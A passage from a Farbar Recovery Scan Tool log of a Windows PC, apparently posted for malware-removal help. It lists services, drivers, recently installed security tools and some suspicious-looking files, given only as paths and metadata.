R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\1.9.741.0\\McCSPServiceHost.exe [1903320 2016-04-18] (McAfee, Inc.)
R2 McMPFSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
S3 McODS; C:\Program Files\McAfee\VirusScan\mcods.exe [795528 2016-04-20] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
R3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [232688 2016-03-07] (McAfee, Inc.)
R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [382456 2016-04-01] (McAfee, Inc.)
R2 mfevtp; C:\WINDOWS\system32\mfevtps.exe [277744 2016-03-07] (McAfee, Inc.)
R2 ModuleCoreService; C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe [1424352 2016-04-21] (McAfee, Inc.)
R2 MSK80Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
R2 PEFService; C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe [1029856 2016-04-21] (Intel Security, Inc.)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [246472 2015-09-15] (Synaptics Incorporated)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation)
S4 AtherosSvc; [X]
S4 cudm; [X]
S4 Intel(R) Capability Licensing Service Interface; [X]
S2 Scheduler; "C:\Program Files (x86)\Windriver\Scheduler.Service.exe" [X]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 athr; C:\Windows\System32\drivers\athw10x.sys [4342936 2015-12-08] (Qualcomm Atheros Communications, Inc.)
R3 cfwids; C:\Windows\System32\drivers\cfwids.sys [78632 2016-03-11] (McAfee, Inc.)
S3 EsgScanner; C:\Windows\System32\DRIVERS\EsgScanner.sys [22704 2016-05-25] ()
S3 GENERICDRV; C:\Program Files (x86)\UEFI WinFlash\amifldrv64.sys [15640 2012-07-27] ()
S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [207968 2016-02-24] (McAfee, Inc.)
R1 KbHook; C:\Program Files (x86)\AntiRansomware2.0\hookdriver64.sys [18720 2013-06-08] (<company name here>)
S3 libwamf; C:\Windows\System32\DRIVERS\libwamf.sys [15664 2016-05-24] (Windows (R) Win 7 DDK provider)
S3 libwasys; C:\Windows\System32\DRIVERS\libwasys.sys [28464 2016-05-24] ()
R2 McPvDrv; C:\Windows\system32\drivers\McPvDrv.sys [79192 2016-04-20] (McAfee, Inc.)
R3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [419624 2016-03-11] (McAfee, Inc.)
R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [349480 2016-03-11] (McAfee, Inc.)
S0 mfeelamk; C:\Windows\System32\drivers\mfeelamk.sys [83608 2016-03-11] (McAfee, Inc.)
R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [493352 2016-03-11] (McAfee, Inc.)
R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [842536 2016-03-11] (McAfee, Inc.)
R3 mfencbdc; C:\Windows\System32\DRIVERS\mfencbdc.sys [543488 2016-02-10] (McAfee, Inc.)
S3 mfencrk; C:\Windows\System32\DRIVERS\mfencrk.sys [109480 2016-02-10] (McAfee, Inc.)
R3 mfesapsn; C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [45728 2016-03-15] (McAfee, Inc.)
R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [243496 2016-03-11] (McAfee, Inc.)
R1 ndisrd; C:\Windows\system32\DRIVERS\ndisrfl.sys [50448 2015-07-28] (Intel Corporation)
S3 NetTap630; C:\Windows\system32\DRIVERS\nettap630.sys [76560 2015-07-29] (Intel Corporation)
R3 RSP2STOR; C:\Windows\system32\DRIVERS\RtsP2Stor.sys [310528 2015-06-09] (Realtek Semiconductor Corp.)
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [42696 2015-09-15] (Synaptics Incorporated)
R3 Thotkey; C:\Windows\System32\drivers\Thotkey.sys [54424 2015-07-29] (Toshiba Corporation)
R3 TXEIx64; C:\Windows\System32\drivers\TXEIx64.sys [88592 2014-01-15] (Intel Corporation)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation)
S1 13114cc54a946f641c081c84a88f491d; system32\DRIVERS\13114cc54a946f641c081c84a88f491d.sys [X]
S3 mfencbdc01; \Device\mfencbdc01.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-05-31 02:52 - 2016-05-31 02:54 - 00020393 _____ C:\Users\Jackie\Downloads\FRST.txt
2016-05-31 02:50 - 2016-05-31 02:51 - 02383872 _____ (Farbar) C:\Users\Jackie\Downloads\FRST64 (1).exe
2016-05-31 02:46 - 2016-05-31 02:52 - 00000000 ____D C:\FRST
2016-05-31 02:45 - 2016-05-31 02:46 - 02383872 _____ (Farbar) C:\Users\Jackie\Downloads\FRST64.exe
2016-05-30 22:10 - 2016-05-31 02:21 - 00004020 _____ C:\WINDOWS\System32\Tasks\Intel Security DAT Reputation (AMCore) periodic endpoint safety pulse
2016-05-30 22:10 - 2016-05-30 22:10 - 00004208 _____ C:\WINDOWS\System32\Tasks\Intel Security DAT Reputation (AMCore) Post DAT update endpoint safety pulse
2016-05-28 21:11 - 2016-05-30 21:51 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-05-28 21:11 - 2016-05-28 21:11 - 00001186 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-05-28 21:11 - 2016-05-28 21:11 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-05-28 21:11 - 2016-05-28 21:11 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-05-28 21:11 - 2016-03-10 14:09 - 00065408 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2016-05-28 21:11 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-05-28 21:11 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2016-05-28 21:10 - 2016-05-28 21:10 - 22851472 _____ (Malwarebytes ) C:\Users\Jackie\Downloads\mbam-setup-cnet.35891-2.2.1.1043.exe
2016-05-26 18:32 - 2016-05-26 18:32 - 00003642 _____ C:\WINDOWS\System32\Tasks\CreateExplorerShellUnelevatedTask
2016-05-26 18:30 - 2016-05-26 18:33 - 00001094 _____ C:\DelFix.txt
2016-05-26 18:30 - 2016-05-26 18:30 - 00000000 ____D C:\WINDOWS\ERUNT
2016-05-26 16:03 - 2016-05-30 23:18 - 00000000 __RSD C:\Users\Jackie\Documents\McAfee Vaults
2016-05-26 16:03 - 2016-05-26 16:03 - 00000000 ____D C:\Users\Jackie\AppData\Local\McAfee File Lock
2016-05-26 16:03 - 2016-04-20 11:00 - 00079192 _____ (McAfee, Inc.) C:\WINDOWS\system32\Drivers\McPvDrv.sys
2016-05-26 01:55 - 2016-05-26 01:55 - 00000000 ____D C:\Program Files (x86)\McAfee.com
2016-05-25 23:54 - 2016-05-28 20:43 - 00000892 _____ C:\WINDOWS\Tasks\Adobe Flash Player PPAPI Notifier.job
2016-05-25 23:54 - 2016-05-25 23:54 - 00003958 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player PPAPI Notifier
2016-05-25 23:12 - 2016-05-25 23:12 - 00987728 _____ (Google Inc.) C:\Users\Jackie\Downloads\ChromeSetup.exe
2016-05-25 21:57 - 2016-05-25 21:57 - 00000000 ____D C:\Program Files (x86)\VS Revo Group
2016-05-25 21:56 - 2016-05-25 21:56 - 02623656 _____ (VS Revo Group Ltd.) C:\Users\Jackie\Downloads\revosetup.exe
2016-05-25 21:32 - 2016-02-24 21:07 - 00207968 _____ (McAfee, Inc.) C:\WINDOWS\system32\Drivers\HipShieldK.sys
2016-05-25 21:27 - 2016-05-25 21:27 - 00000000 ____D C:\ProgramData\Intel Security
2016-05-25 21:26 - 2016-05-26 16:00 - 00003142 _____ C:\WINDOWS\System32\Tasks\McAfeeLogon
2016-05-25 21:23 - 2016-05-25 21:23 - 00000000 ____D C:\Program Files\McAfee.com
2016-05-25 21:22 - 2016-05-25 21:22 - 00000000 ____D C:\Program Files\Common Files\Intel Security
2016-05-25 21:21 - 2016-05-25 21:21 - 00000000 ____D C:\Program Files\Common Files\AV
2016-05-25 21:07 - 2016-03-07 15:38 - 00277744 _____ (McAfee, Inc.) C:\WINDOWS\system32\mfevtps.exe
2016-05-25 21:06 - 2016-05-25 21:06 - 08111368 _____ (McAfee, Inc.) C:\Users\Jackie\Downloads\Setup_serial_v6MNfGYb2JXFv4AwyJs1gw2_key.exe
2016-05-25 19:20 - 2016-05-25 23:56 - 00000000 ____D C:\Program Files\Enigma Software Group
2016-05-25 19:20 - 2016-05-25 19:21 - 00000000 ____D C:\sh4ldr
2016-05-25 19:20 - 2016-05-25 19:20 - 00022704 _____ C:\WINDOWS\system32\Drivers\EsgScanner.sys
2016-05-25 19:19 - 2016-05-25 19:19 - 03482800 _____ (Enigma Software Group USA, LLC.) C:\Users\Jackie\Downloads\SpyHunter-Installer.exe
2016-05-25 18:11 - 2016-05-25 18:11 - 00000442 _____ C:\WINDOWS\DCEBOOT.RST
2016-05-25 18:08 - 2016-05-25 18:08 - 00231960 _____ C:\WINDOWS\RegBootClean64.exe
2016-05-25 18:08 - 2016-05-25 18:08 - 00021528 _____ C:\WINDOWS\DCEBoot64.exe
2016-05-25 18:04 - 2016-05-25 18:08 - 00000000 ____D C:\Program Files (x86)\AntiRansomware2.0
2016-05-25 18:04 - 2016-05-25 18:04 - 00000000 ____D C:\ProgramData\AntiRansomware
2016-05-25 15:30 - 2016-05-25 15:30 - 00000000 ____D C:\Users\Jackie\AppData\Roaming\AVG
2016-05-25 15:27 - 2016-05-25 15:27 - 00000000 ____D C:\Users\Jackie\AppData\Roaming\TuneUp Software
2016-05-25 15:26 - 2016-05-25 18:27 - 00000000 ___HD C:\$AVG
2016-05-25 15:24 - 2016-05-25 18:30 - 00000000 ____D C:\ProgramData\MFAData
2016-05-25 15:24 - 2016-05-25 15:24 - 00000000 ____D C:\Users\Jackie\AppData\Local\MFAData
2016-05-25 15:18 - 2016-05-25 18:35 - 00000000 ____D C:\ProgramData\Avg
2016-05-25 15:18 - 2016-05-25 18:34 - 00000000 ____D C:\Users\Jackie\AppData\Local\AvgSetupLog
2016-05-25 15:18 - 2016-05-25 18:30 - 00000000 ____D C:\Users\Jackie\AppData\Local\Avg
2016-05-25 14:41 - 2016-05-26 16:02 - 00000000 ____D C:\Program Files\Common Files\McAfee
2016-05-25 12:45 - 2016-05-26 16:00 - 00000000 ____D C:\WINDOWS\System32\Tasks\McAfee
2016-05-25 12:43 - 2016-05-26 16:03 - 00000000 ____D C:\Program Files\McAfee
2016-05-25 11:36 - 2016-05-25 11:37 - 00509440 _____ (Tech Support Guy System) C:\Users\Jackie\Downloads\SysInfo.exe
2016-05-25 07:28 - 2016-05-25 18:08 - 00000000 ____D C:\WINDOWS\Cudm1110
2016-05-24 19:49 - 2016-05-24 19:49 - 00028464 _____ C:\WINDOWS\system32\Drivers\libwasys.sys
2016-05-24 19:49 - 2016-05-24 19:49 - 00015664 _____ (Windows (R) Win 7 DDK provider) C:\WINDOWS\system32\Drivers\libwamf.sys
2016-05-24 17:01 - 2016-05-24 17:01 - 00000000 ____D C:\ProgramData\Kaspersky Lab Setup Files
2016-05-24 11:53 - 2016-05-26 16:07 - 00000000 ____D C:\Quarantine
2016-05-24 11:53 - 2016-05-24 11:55 - 00001735 _____ C:\config.ini
2016-05-24 01:55 - 2016-05-24 01:55 - 00000000 ____D C:\Users\Jackie\AppData\Roaming\Mozilla
2016-05-24 01:54 - 2016-05-24 01:54 - 06859776 _____ C:\Users\Jackie\AppData\Roaming\agent.dat
2016-05-24 01:54 - 2016-05-24 01:54 - 00018432 _____ C:\Users\Jackie\AppData\Roaming\Main.dat
2016-05-24 01:53 - 2016-05-24 01:53 - 00076565 _____ C:\Users\Jackie\AppData\Roaming\Mat-La.bin
2016-05-24 01:53 - 2016-05-24 01:53 - 00000000 _____ C:\WINDOWS\SysWOW64\Number of results
2016-05-24 01:52 - 2016-05-24 01:52 - 00127488 _____ C:\Users\Jackie\AppData\Roaming\Installer.dat
2016-05-24 01:31 - 2016-05-25 16:38 - 00000000 ____D C:\bin
2016-05-24 01:15 - 2016-05-25 18:18 - 00000000 ____D C:\WINDOWS\SysWOW64\CpuHeatMapping2200
2016-05-24 01:15 - 2016-05-24 01:15 - 00000000 ____D C:\Users\Jackie\AppData\Roaming\Securid
2016-05-24 01:03 - 2016-05-24 20:29 - 00187904 _____ C:\WINDOWS\rsrcs.dll
2016-05-24 01:02 - 2016-05-24 01:02 - 00024596 _____ C:\WINDOWS\System32\Tasks\{0A0A0A47-0E0D-780B-0A11-0E7E7909110B}
2016-05-24 01:02 - 2016-05-24 01:02 - 00003676 _____ C:\WINDOWS\System32\Tasks\TechAgent Task
2016-05-21 23:03 - 2016-05-21 23:09 - 00000000 ____D C:\ProgramData\Big Fish
2016-05-21 23:01 - 2016-05-21 23:03 - 00000000 ____D C:\Users\Jackie\AppData\Local\Big Fish
2016-05-21 22:30 - 2016-05-21 22:30 - 00000000 ____D C:\Program Files (x86)\ReflexiveArcade
2016-05-21 14:33 - 2016-05-21 14:33 - 08111368 _____ (McAfee, Inc.) C:\Users\Jackie\Downloads\Setup_serial_lga7Zua5iehXUFMlXBiSWA2_key.exe
2016-05-21 14:32 - 2016-05-21 14:32 - 00000015 _____ C:\Users\Jackie\Documents\mcafee number.txt
2016-05-21 11:25 - 2016-05-21 11:25 - 08111368 _____ (McAfee, Inc.) C:\Users\Jackie\Downloads\Setup_serial_JB-vb5puYg2Co5a-3ijZgg2_key.exe
2016-05-20 11:54 - 2016-05-27 11:30 - 00000000 ____D C:\KVRT_Data
2016-05-18 22:06 - 2016-05-25 08:19 - 00028272 _____ C:\WINDOWS\system32\Drivers\TrueSight.sys
2016-05-18 22:00 - 2016-05-25 16:38 - 00000000 ____D C:\ProgramData\RogueKiller
2016-05-18 20:27 - 2016-05-18 20:27 - 00000000 ____D C:\Program Files (x86)\NortonInstaller
2016-05-11 08:57 - 2016-05-11 08:57 - 00564736 _____ C:\WINDOWS\system32\bitst.exe
2016-05-10 16:52 - 2016-04-23 00:31 - 13018112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2016-05-10 16:51 - 2016-04-23 01:28 - 01542816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-05-10 16:51 - 2016-04-23 01:24 - 07474528 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-05-10 16:51 - 2016-04-23 01:24 - 01819208 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-05-10 16:51 - 2016-04-23 01:10 - 02919832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-05-10 16:51 - 2016-04-23 01:09 - 22561256 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-05-10 16:51 - 2016-04-23 01:09 - 05240960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2016-05-10 16:51 - 2016-04-23 01:08 - 06605504 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2016-05-10 16:51 - 2016-04-23 00:30 - 22379008 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-05-10 16:51 - 2016-04-23 00:28 - 16984576 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2016-05-10 16:51 - 2016-04-23 00:26 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MosStorage.dll
2016-05-10 16:51 - 2016-04-23 00:25 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapsBtSvc.dll
2016-05-10 16:51 - 2016-04-23 00:23 - 11545088 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-05-10 16:51 - 2016-04-23 00:22 - 09918976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-05-10 16:51 - 2016-04-23 00:22 - 00460800 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapConfiguration.dll
2016-05-10 16:51 - 2016-04-23 00:20 - 19344384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-05-10 16:51 - 2016-04-23 00:19 - 07977472 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2016-05-10 16:51 - 2016-04-23 00:19 - 01056256 _____ (Microsoft Corporation) C:\WINDOWS\system32\JpMapControl.dll
2016-05-10 16:51 - 2016-04-23 00:19 - 00970752 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-05-10 16:51 - 2016-04-23 00:19 - 00853504 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll
2016-05-10 16:51 - 2016-04-23 00:19 - 00440320 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredProvDataModel.dll
2016-05-10 16:51 - 2016-04-23 00:18 - 24604672 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-05-10 16:51 - 2016-04-23 00:18 - 00988160 _____ (Microsoft Corporation) C:\WINDOWS\system32\NMAA.dll
2016-05-10 16:51 - 2016-04-23 00:18 - 00939520 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapControlCore.dll
2016-05-10 16:51 - 2016-04-23 00:18 - 00870400 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2016-05-10 16:51 - 2016-04-23 00:18 - 00349696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapConfiguration.dll
2016-05-10 16:51 - 2016-04-23 00:16 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\JpMapControl.dll
2016-05-10 16:51 - 2016-04-23 00:15 - 00792064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-05-10 16:51 - 2016-04-23 00:15 - 00784896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NMAA.dll
2016-05-10 16:51 - 2016-04-23 00:15 - 00348672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CredProvDataModel.dll
2016-05-10 16:51 - 2016-04-23 00:14 - 13383168 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-05-10 16:51 - 2016-04-23 00:14 - 00711680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapControlCore.dll
2016-05-10 16:51 - 2016-04-23 00:13 - 07200256 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2016-05-10 16:51 - 2016-04-23 00:13 - 06295552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2016-05-10 16:51 - 2016-04-23 00:10 - 12125696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-05-10 16:51 - 2016-04-23 00:08 - 05324288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2016-05-10 16:51 - 2016-04-23 00:08 - 02061824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2016-05-10 16:51 - 2016-04-23 00:07 - 05205504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2016-05-10 16:51 - 2016-04-23 00:06 - 06974464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2016-05-10 16:51 - 2016-04-23 00:03 - 05660160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-05-10 16:51 - 2016-04-23 00:02 - 07832576 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-05-10 16:50 - 2016-05-06 00:53 - 00095072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdport.sys
2016-05-10 16:50 - 2016-05-06 00:05 - 00241664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptngc.dll
2016-05-10 16:50 - 2016-05-06 00:03 - 00649216 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll
2016-05-10 16:50 - 2016-05-05 23:53 - 00351232 _____ (Microsoft Corporation) C:\WINDOWS\system32\NgcCtnr.dll
2016-05-10 16:50 - 2016-05-05 23:49 - 00289792 _____ (Microsoft Corporation) C:\WINDOWS\system32\NgcCtnrSvc.dll
2016-05-10 16:50 - 2016-05-05 23:44 - 00582656 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngccredprov.dll
2016-05-10 16:50 - 2016-05-05 23:43 - 00320000 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptngc.dll
2016-05-10 16:50 - 2016-05-05 23:23 - 00076288 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcpopkeysrv.dll
2016-05-10 16:50 - 2016-04-30 02:42 - 01387520 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2016-05-10 16:50 - 2016-04-30 02:31 - 03591168 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-05-10 16:50 - 2016-04-23 02:12 - 01401024 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2016-05-10 16:50 - 2016-04-23 02:12 - 01184960 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-05-10 16:50 - 2016-04-23 02:12 - 00713920 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2016-05-10 16:50 - 2016-04-23 02:12 - 00514752 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-05-10 16:50 - 2016-04-23 02:12 - 00294592 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2016-05-10 16:50 - 2016-04-23 02:12 - 00190144 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2016-05-10 16:50 - 2016-04-23 02:12 - 00092352 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2016-05-10 16:50 - 2016-04-23 02:12 - 00046784 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2016-05-10 16:50 - 2016-04-23 01:28 - 01557768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-05-10 16:50 - 2016-04-23 01:26 - 00707608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll
2016-05-10 16:50 - 2016-04-23 01:24 - 01997328 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-05-10 16:50 - 2016-04-23 01:24 - 00754664 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2016-05-10 16:50 - 2016-04-23 01:24 - 00638816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fvevol.sys
2016-05-10 16:50 - 2016-04-23 01:24 - 00335712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fastfat.sys
2016-05-10 16:50 - 2016-04-23 01:24 - 00099680 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pdc.sys
2016-05-10 16:50 - 2016-04-23 01:22 - 01161120 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcrt4.dll
2016-05-10 16:50 - 2016-04-23 01:18 - 00026408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2016-05-10 16:50 - 2016-04-23 01:13 - 00502104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupEngine.dll
2016-05-10 16:50 - 2016-04-23 01:13 - 00306832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlanapi.dll
2016-05-10 16:50 - 2016-04-23 01:13 - 00084832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupApi.dll
2016-05-10 16:50 - 2016-04-23 01:12 - 00925064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfplat.dll
2016-05-10 16:50 - 2016-04-23 01:12 - 00451928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFCaptureEngine.dll
2016-05-10 16:50 - 2016-04-23 01:12 - 00413536 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifitask.exe
2016-05-10 16:50 - 2016-04-23 01:11 - 01092464 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfplat.dll
2016-05-10 16:50 - 2016-04-23 01:11 - 00696672 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupEngine.dll
2016-05-10 16:50 - 2016-04-23 01:11 - 00498960 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFCaptureEngine.dll
2016-05-10 16:50 - 2016-04-23 01:11 - 00390496 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanapi.dll
2016-05-10 16:50 - 2016-04-23 01:11 - 00131424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ufxsynopsys.sys
2016-05-10 16:50 - 2016-04-23 01:11 - 00115040 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupApi.dll
2016-05-10 16:50 - 2016-04-23 01:10 - 03673424 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-05-10 16:50 - 2016-04-23 01:10 - 00330072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
2016-05-10 16:50 - 2016-04-23 01:09 - 21123320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-05-10 16:50 - 2016-04-23 01:09 - 04074160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2016-05-10 16:50 - 2016-04-23 01:09 - 00569744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SHCore.dll
2016-05-10 16:50 - 2016-04-23 01:09 - 00565600 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2016-05-10 16:50 - 2016-04-23 01:09 - 00465760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
2016-05-10 16:50 - 2016-04-23 01:09 - 00303216 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppHost.exe
2016-05-10 16:50 - 2016-04-23 01:09 - 00255168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LockAppHost.exe
2016-05-10 16:50 - 2016-04-23 01:08 - 04515256 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2016-05-10 16:50 - 2016-04-23 01:08 - 00725776 _____ (Microsoft Corporation) C:\WINDOWS\system32\SHCore.dll
2016-05-10 16:50 - 2016-04-23 01:07 - 01848072 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
2016-05-10 16:50 - 2016-04-23 01:07 - 01536088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
2016-05-10 16:50 - 2016-04-23 01:07 - 00204048 _____ (Microsoft Corporation) C:\WINDOWS\system32\rsaenh.dll
2016-05-10 16:50 - 2016-04-23 01:07 - 00183904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rsaenh.dll
2016-05-10 16:50 - 2016-04-23 01:06 - 00291360 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininit.exe
2016-05-10 16:50 - 2016-04-23 01:02 - 00188256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2016-05-10 16:50 - 2016-04-23 01:01 - 01996640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2016-05-10 16:50 - 2016-04-23 01:01 - 00650304 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxgi.dll
2016-05-10 16:50 - 2016-04-23 01:01 - 00619296 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d10level9.dll
2016-05-10 16:50 - 2016-04-23 01:01 - 00577368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2016-05-10 16:50 - 2016-04-23 01:01 - 00522176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxgi.dll
2016-05-10 16:50 - 2016-04-23 01:01 - 00513368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d10level9.dll
2016-05-10 16:50 - 2016-04-23 01:01 - 00393568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
